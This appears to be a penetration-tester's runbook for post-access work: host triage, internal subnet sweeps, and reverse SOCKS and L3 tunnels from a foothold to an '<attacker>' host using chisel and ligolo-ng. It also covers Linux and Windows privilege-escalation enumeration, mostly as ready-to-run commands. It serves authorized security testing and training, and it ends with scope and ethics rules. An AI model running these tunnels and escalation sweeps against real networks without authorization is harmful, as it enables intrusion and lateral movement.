Pivoting, Tunneling & Privilege Escalation
Post-access runbook for authorized engagements: host triage, internal discovery, SOCKS/L3 tunneling, and systematic Linux and Windows privilege-escalation enumeration.
A foothold is a doorway, not the objective. This runbook covers moving inside the estate — only as far as the engagement explicitly allows, and against authorized hosts only.
1. Situational awareness
On any new host, map what it can see and reach before pivoting.
id; whoami; hostname; uname -a
ip a; ip route; cat /etc/hosts
ps aux; ss -tulpn
# Quick user and privilege context
sudo -n -l 2>/dev/null
cat /etc/passwd | grep -v nologin
2. Internal discovery
# Sweep the subnet the foothold can reach
for i in $(seq 1 254); do (ping -c1 -W1 10.10.10.$i >/dev/null 2>&1 && echo "10.10.10.$i up") & done; wait
# SMB/AD enumeration if Windows services are present
enum4linux-ng -A 10.10.10.10 -oJ enum4linux.json
Look for shares, internal DNS, and trust relationships pointing at a higher-value host.
3. Tunneling and pivoting
Route tooling through the foothold instead of dropping tools everywhere.
# Chisel: reverse SOCKS proxy
# attacker: chisel server -p 8080 --reverse
# foothold: ./chisel client <attacker>:8080 R:socks
# Point proxychains at the SOCKS port (default 1080)
proxychains nmap -sT -Pn -p 445,3389,5985 --open 10.10.10.0/24
# Internal web access through the tunnel
proxychains curl -s http://10.10.10.20:8080/ | head
# ligolo-ng gives a cleaner L3 tunnel with a TUN interface
# attacker: ./proxy -selfcert
# foothold: ./agent -connect <attacker>:11601 -ignore-cert
# then add the route and bring the interface up on the attacker
4. Linux privilege escalation
# Automate the sweep
./linpeas.sh -a | tee linpeas.out
# Targeted manual checks
sudo -l
find / -perm -4000 -type f 2>/dev/null
getcap -r / 2>/dev/null
cat /etc/crontab; ls -la /etc/cron.*
Common paths: SUID/capability binaries, writable cron scripts, misconfigured sudo, group-writable files, docker/lxd groups, credentials in history and configs.
5. Windows privilege escalation
# Host and privilege triage (run via your shell)
whoami /priv
whoami /groups
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
# Automated sweep
.\winPEASx64.exe | tee winpeas.txt
Look for SeImpersonate, SeDebug, SeBackup; unquoted service paths; weak service permissions; AlwaysInstallElevated; stored credentials. When AD is in play, consider Kerberoasting and AS-REP roasting.
6. Full pipeline
# 1. Situational awareness
id; whoami; hostname; uname -a; ip a; ip route; ps aux; ss -tulpn
# 2. Internal sweep + AD enumeration
for i in $(seq 1 254); do (ping -c1 -W1 10.10.10.$i >/dev/null 2>&1 && echo "10.10.10.$i up") & done; wait
enum4linux-ng -A 10.10.10.10 -oJ enum4linux.json
# 3. Tunnel (chisel server on attacker, client on foothold)
# attacker: chisel server -p 8080 --reverse
# foothold: ./chisel client <attacker>:8080 R:socks
proxychains nmap -sT -Pn -p 445,3389,5985 --open 10.10.10.0/24
# 4. Privilege escalation enumeration
./linpeas.sh -a | tee linpeas.out
sudo -l; find / -perm -4000 -type f 2>/dev/null; getcap -r / 2>/dev/null
.\winPEASx64.exe | tee winpeas.txt
Ethics & legality
- Pivot only within the authorized scope and network boundaries agreed in the rules of engagement.
- Escalate only to the level needed to prove impact; do not continue “to see how far it goes.”
- Never modify data, create persistence, or touch systems outside scope.
- Document every host touched and the exact command used.